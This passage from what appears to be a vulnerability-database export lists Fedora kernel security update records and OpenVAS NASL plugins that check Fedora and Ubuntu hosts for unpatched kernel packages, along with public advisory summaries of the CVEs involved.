"Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. ", "modified": "2019-03-11T20:20:34", "published": "2019-03-11T20:20:34", "id": "FEDORA:7723E6075F15", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: kernel-headers-4.20.14-100.fc28", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-16862", "CVE-2018-16880", "CVE-2018-18710", "CVE-2018-19407", "CVE-2018-19824", "CVE-2019-3459", "CVE-2019-3460", "CVE-2019-3701", "CVE-2019-6974", "CVE-2019-7221", "CVE-2019-7222", "CVE-2019-8912", "CVE-2019-8980", "CVE-2019-9162"], "description": "The kernel meta package ", "modified": "2019-03-01T02:41:34", "published": "2019-03-01T02:41:34", "id": "FEDORA:20DCB60779B2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: kernel-4.20.12-200.fc29", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10322", "CVE-2018-10323", "CVE-2018-10840", "CVE-2018-10853", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-11506", "CVE-2018-12232", "CVE-2018-12633", "CVE-2018-12714", "CVE-2018-12896", "CVE-2018-13053", "CVE-2018-13093", "CVE-2018-13094", "CVE-2018-13095", "CVE-2018-13405", "CVE-2018-14633", "CVE-2018-14678", "CVE-2018-14734", "CVE-2018-15471", "CVE-2018-16862", "CVE-2018-16880", "CVE-2018-17182", "CVE-2018-18710", "CVE-2018-19406", "CVE-2018-19407", "CVE-2018-19824", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-5391", "CVE-2019-3459", "CVE-2019-3460", "CVE-2019-3701", "CVE-2019-6974", "CVE-2019-7221", "CVE-2019-7222", "CVE-2019-8912", "CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "description": "The kernel meta package ", "modified": "2019-03-11T20:20:33", "published": "2019-03-11T20:20:33", "id": "FEDORA:E93AE6077DCD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: kernel-4.20.14-100.fc28", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:32:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875904", "type": "openvas", "title": "Fedora Update for kernel-headers FEDORA-2019-7462acf8ba", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875904\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:26:45 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for kernel-headers FEDORA-2019-7462acf8ba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-7462acf8ba\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GSOTCU43RLEBAED6RYEVHNYONC3XWSOA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel-headers'\n package(s) announced via the FEDORA-2019-7462acf8ba advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Kernel-headers includes the C header files that specify the interface\nbetween the Linux kernel and userspace libraries and programs. The\nheader files define structures and constants that are needed for\nbuilding most standard programs and are also needed for rebuilding the\nglibc package.\");\n\n script_tag(name:\"affected\", value:\"'kernel-headers' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.20.12~200.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310875505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875505", "type": "openvas", "title": "Fedora Update for kernel-headers FEDORA-2019-196ab64d65", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875505\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-12 04:12:20 +0100 (Tue, 12 Mar 2019)\");\n script_name(\"Fedora Update for kernel-headers FEDORA-2019-196ab64d65\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-196ab64d65\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GI6YTN6SENQC7IZSHWB2HILUZEN3EFKP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel-headers'\n package(s) announced via the FEDORA-2019-196ab64d65 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"kernel-headers on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.20.14~100.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "The remote host is missing an update for the ", "modified": "2019-04-26T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310843952", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843952", "type": "openvas", "title": "Ubuntu Update for linux USN-3930-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843952\");\n script_version(\"2019-04-26T08:24:31+0000\");\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\",\n \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\",\n \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\",\n \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-26 08:24:31 +0000 (Fri, 26 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:39:35 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Ubuntu Update for linux USN-3930-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.10\");\n\n script_xref(name:\"USN\", value:\"3930-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3930-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the USN-3930-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mathias Payer and Hui Peng discovered\na use-after-free vulnerability in the Advanced Linux Sound Architecture\n(ALSA) subsystem. A physically proximate attacker could use this to cause\na denial of service (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information\nleak in the Bluetooth implementation of the Linux kernel. An attacker\nwithin Bluetooth range could use this to expose sensitive information\n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM with\naccess to /dev/kvm could use this to cause a denial of service (guest VM\ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in\nthe KVM subsystem of the Linux kernel, when using nested virtual machines.\nA local attacker in a guest VM could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code in the host system.\n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in\nthe KVM subsystem of the Linux kernel, when nested virtualization is used.\nA local attacker could use this to expose sensitive information (host\nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was\ninsufficiently hardened against Spectre V1 attacks. A local attacker could\nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user-\nspace API for crypto (af_alg) implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory\nwhen handling certain errors while reading files. A local attacker could\nuse this to cause a denial of service (excessive memory consumption).\n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI\nimplementation in the Linux kernel. A local attacker with access to the\nIPMI character device files could use this to cause a denial of service\n(system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux kernel\nperformed insufficient ASN.1 length checks. An atta ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux' package(s) on Ubuntu 18.10.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1008-gcp\", ver:\"4.18.0-1008.9\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1009-kvm\", ver:\"4.18.0-1009.9\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1011-raspi2\", ver:\"4.18.0-1011.13\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1012-aws\", ver:\"4.18.0-1012.14\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1014-azure\", ver:\"4.18.0-1014.14\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic\", ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic-lpae\", ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-lowlatency\", ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-snapdragon\", ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.18.0.1012.12\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.18.0.1014.15\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.18.0.1008.8\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.18.0.1008.8\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.18.0.1009.9\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.18.0.1011.8\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "The remote host is missing an update for the ", "modified": "2019-04-26T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310843959", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843959", "type": "openvas", "title": "Ubuntu Update for linux-azure USN-3930-2", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843959\");\n script_version(\"2019-04-26T08:24:31+0000\");\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\",\n \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\",\n \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\",\n \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-26 08:24:31 +0000 (Fri, 26 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:40:38 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Ubuntu Update for linux-azure USN-3930-2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3930-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3930-2/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-azure'\n package(s) announced via the USN-3930-2 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"USN-3930-1 fixed vulnerabilities in\nthe Linux kernel for Ubuntu 18.10. This update provides the corresponding\nupdates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.10\nfor Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability in the\nAdvanced Linux Sound Architecture (ALSA) subsystem. A physically proximate\nattacker could use this to cause a denial of service (system crash).\n(CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information\nleak in the Bluetooth implementation of the Linux kernel. An attacker\nwithin Bluetooth range could use this to expose sensitive information\n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM with\naccess to /dev/kvm could use this to cause a denial of service (guest VM\ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in\nthe KVM subsystem of the Linux kernel, when using nested virtual machines.\nA local attacker in a guest VM could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code in the host system.\n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in\nthe KVM subsystem of the Linux kernel, when nested virtualization is used.\nA local attacker could use this to expose sensitive information (host\nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was\ninsufficiently hardened against Spectre V1 attacks. A local attacker could\nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user-\nspace API for crypto (af_alg) implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory\nwhen handling certain errors while reading files. A local attacker could\nuse this to cause a denial of service (excessive memory consumption).\n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI\nimplementation in the Linux kernel. A local attacker with access to the\nIPMI character ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux-azure' package(s) on Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1014-azure\", ver:\"4.18.0-1014.14~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic-lpae\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-lowlatency\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-snapdragon\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.18.0.1014.13\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-snapdragon-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-8980", "CVE-2019-8912", "CVE-2018-16862", "CVE-2019-9162", "CVE-2018-18710", "CVE-2019-7221", "CVE-2019-3701", "CVE-2019-6974", "CVE-2019-3459", "CVE-2018-19407", "CVE-2018-16880"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310876177", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876177", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2019-7462acf8ba", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876177\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-8912\", \"CVE-2019-7221\", \"CVE-2019-6974\", \"CVE-2019-7222\", \"CVE-2018-16880\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-3701\", \"CVE-2018-19824\", \"CVE-2018-16862\", \"CVE-2018-19407\", \"CVE-2018-18710\", \"CVE-2019-9162\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:37:57 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for kernel FEDORA-2019-7462acf8ba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 